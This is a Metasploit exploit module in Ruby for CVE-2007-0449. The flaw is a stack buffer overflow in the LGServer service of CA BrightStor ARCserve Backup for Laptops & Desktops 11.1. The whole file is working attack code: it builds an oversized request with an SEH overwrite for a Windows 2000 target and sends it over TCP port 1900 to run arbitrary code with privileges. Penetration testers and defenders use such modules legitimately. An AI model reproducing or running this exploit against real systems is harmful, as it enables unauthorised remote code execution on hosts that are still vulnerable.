##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
          for Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could
          overflow the buffer and execute arbitrary code.
        },
        'Author' => [ 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2007-0449' ],
          [ 'OSVDB', '31593' ],
          [ 'BID', '22342' ],
        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        'Payload' => {
          'Space' => 600,
          'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'Windows 2000 Pro English All',	{ 'Ret' => 0x75022ac4 } ],
        ],
        'DisclosureDate' => '2007-01-31',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(1900)
      ]
    )
  end

  def exploit
    connect

    filler = "0000016705" + rand_text_english(2322)
    seh = generate_seh_payload(target.ret)
    sploit = filler + seh + "\x58" * 0x4141

    print_status("Trying target #{target.name}...")

    sock.put(sploit)
    handler
    disconnect
  end
end
